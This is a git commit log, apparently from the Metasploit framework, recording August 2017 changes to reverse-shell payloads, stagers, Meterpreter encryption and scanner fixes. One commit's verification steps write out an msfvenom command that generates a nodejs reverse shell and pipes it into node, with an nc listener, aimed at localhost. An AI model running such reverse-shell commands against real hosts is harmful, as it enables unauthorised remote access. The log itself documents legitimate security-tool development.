100afaf251
Add ./ to cmd_use for paths and simplify cases
...
Don't accommodate typos.
2017-08-23 10:24:37 -05:00
41eba74ddf
prefer Addrinfo over ipaddress gem
2017-08-22 23:03:45 -05:00
17aef43bb8
Fix UDP scanner mixin with multicast addresses
...
This fixes #8828 by only binding UDP sockets when we have unicast
targets. If we have multicast, prefer unbound sockets.
This also brings in the 'ipaddress' gem for identifying multicast
addresses. It looks like it could replace a lot of custom-built
functionality in rex-socket, including RangeWalker. Will need to see how
efficient it is.
2017-08-22 06:44:43 -05:00
29c48f9d8d
cleanup accounts post API
2017-08-21 23:00:57 -05:00
e3a9ddfc22
fix retry case for acquiring security descriptor
2017-08-21 22:52:53 -05:00
0d17e94f54
handle unmapped sids consistently
2017-08-21 22:36:26 -05:00
c14daf3fcc
Land #8857 , Reverse and bind shells in R
2017-08-21 15:49:24 -05:00
605330faf6
Land #8842 , add linux/aarch64/shell_reverse_tcp
2017-08-21 15:44:28 -05:00
8876919f38
Fix typo s/rport/port/ in build_brute_message
...
I missed this in #7202 .
2017-08-21 12:32:41 -05:00
429824b5c9
guid is hex values
2017-08-21 03:44:02 -05:00
8700a36858
make session_guid default with the correct length
2017-08-21 03:24:37 -05:00
f961495860
Land #8625 , Remove OpenSSL from Windows Meterp, packet header changes, and TLV packet encryption
2017-08-20 19:13:51 -05:00
ca7d481658
Bump version of framework to 4.16.0
2017-08-20 16:57:48 -07:00
5e8c2200ac
Merge branch 'master' into land-8625-crypttlv2
2017-08-20 18:54:51 -05:00
f7dc831e9a
Land #8799 , Add module to detect Docker, LXC, and systemd-nspawn containers
2017-08-20 14:45:57 -05:00
6afd90b7f0
Land #8848 , fix extra sleep on linux x86 stager
2017-08-19 22:12:19 -05:00
0145fc3972
payload/r.rb and UUID update
2017-08-19 06:43:28 -04:00
95824ce132
Bump version of framework to 4.15.8
2017-08-18 10:03:23 -07:00
dc358dd087
unknow to unknown
2017-08-18 11:33:48 -04:00
74f89857d8
fix extra sleep on linux x86 stager
2017-08-18 15:20:35 +09:00
8b4ccc66c7
add linux/aarch64/shell_reverse_tcp
2017-08-17 18:55:37 +08:00
5b7785438f
Add session naming support to CommandDispatcher
2017-08-16 18:18:49 -05:00
6eae3b3d4e
Add session name output to ReadableText
2017-08-16 18:14:56 -05:00
fa292dce96
Fix issue with truncated values when unpacking packets
2017-08-16 11:01:54 +10:00
70a82b5c67
Land #8834 , add resiliency to x64 linux reverse_tcp stagers
2017-08-15 08:04:32 -04:00
debbc31142
use separate module names for x86 and x64 generators
2017-08-15 08:02:01 -04:00
db2e3f2ddd
add retry to linux reverse tcp x64
2017-08-15 12:49:29 +09:00
69c4ae99a7
Land #8811 , fix peer printing with bruteforce modules
2017-08-14 17:31:48 -04:00
1a4db844c0
Refactor build_brute_message for legacy printing
2017-08-14 11:17:34 -05:00
59086af261
Land #8771 , rewrite linux x64 stagers with Metasm
2017-08-14 02:32:29 -04:00
0ab6dd46d3
Land #8762 , add initial Rex FTP protocol implementation
2017-08-14 01:59:53 -04:00
26193216d1
Land #8686 , add 'download' and simplified URI request methods to http client mixin
...
Updated PDF author metadata downloader to support the new methods.
2017-08-14 01:40:17 -04:00
5d05ca154a
added http client 'download' method and updates to pdf author module from @bcoles
2017-08-14 01:08:53 -04:00
437fe4b63a
handle missing util.pump in nodejs shell payloads
...
Modern NodeJS (since 5.3.0) has removed util.pump in favor of stream.pipe.
On current versions the nodejs tcp shell payloads error out:
```
$ node --version
v7.10.0
$ msfvenom -p nodejs/shell_reverse_tcp LHOST=127.0.0.1 LPORT=7777 | node
<snip>
TypeError: util.pump is not a function
at Socket.<anonymous> ([stdin]:1:405)
at Object.onceWrapper (events.js:293:19)
at emitNone (events.js:86:13)
at Socket.emit (events.js:188:7)
at TCPConnectWrap.afterConnect [as oncomplete] (net.js:1080:10)
```
With this change, bind and reverse tcp should be tolerant of both new and older versions.
*Reference*
https://github.com/nodejs/node/pull/2531
*Verification steps*
1. Set up a handler (either exploit/multi/handler or simple nc)
```
$ nc -l -v 7777
```
2. Use patched version with various versions of node:
```
msfvenom -p nodejs/shell_reverse_tcp LHOST=127.0.0.1 LPORT=7777 | node
```
3. Confirm both old and new versions of node result in shell, not error.
2017-08-12 20:40:03 -07:00
be926e1d75
Bump version of framework to 4.15.7
2017-08-11 10:12:37 -07:00
e64eaf1573
remove additional match? for older ruby compat
2017-08-08 19:51:35 -05:00
3f8ee86e3e
revert match change - this has problems with older ruby versions
2017-08-08 19:47:48 -05:00
0ac19087cd
Land #8720 , add resiliency (retries + sleep) to linux x86 stagers
2017-08-08 19:36:47 -05:00
4ca68a178b
switch reverse_tcp stagers to all prefer StagerRetryCount
...
This leaves ReverseConnectRetries as an alternate spelling.
2017-08-08 19:27:00 -05:00
83212b8b6b
minor code cleanup
2017-08-08 19:26:59 -05:00
bca8e77163
add alias support for datastore options
2017-08-08 19:26:59 -05:00
b35d53bd02
code cleanup in opt_int while we're here
2017-08-08 19:06:51 -05:00
47dc3772a7
add OptFloat datastore option
2017-08-08 19:06:51 -05:00
331279d891
handle fractional seconds
2017-08-08 19:06:46 -05:00
a396d860e7
change SleepSeconds to StagerRetryWait
2017-08-08 19:26:24 +09:00
d7e8b32312
Merge branch 'upstream/master' into transport-agnostic-packet-encryption
2017-08-08 17:30:51 +10:00
1a9a942c1f
Add external module template for capture servers
2017-08-07 13:31:46 -05:00
cfd377fbd4
Support padding on the CAN bus.
...
Also use a hash for passing options around instead of individual params.
2017-08-06 18:05:59 -05:00
9858147dae
Add module to detect Docker and LXC containers
...
Detect Docker by:
- Presence of .dockerenv file.
- Finding "docker" in /proc/1/cgroup
Detect LXC by:
- Finding "lxc" in /proc/1/cgroup
2017-08-05 18:59:36 -05:00
83cd0bc977
Bump version of framework to 4.15.6
2017-08-04 10:07:09 -07:00
William Vu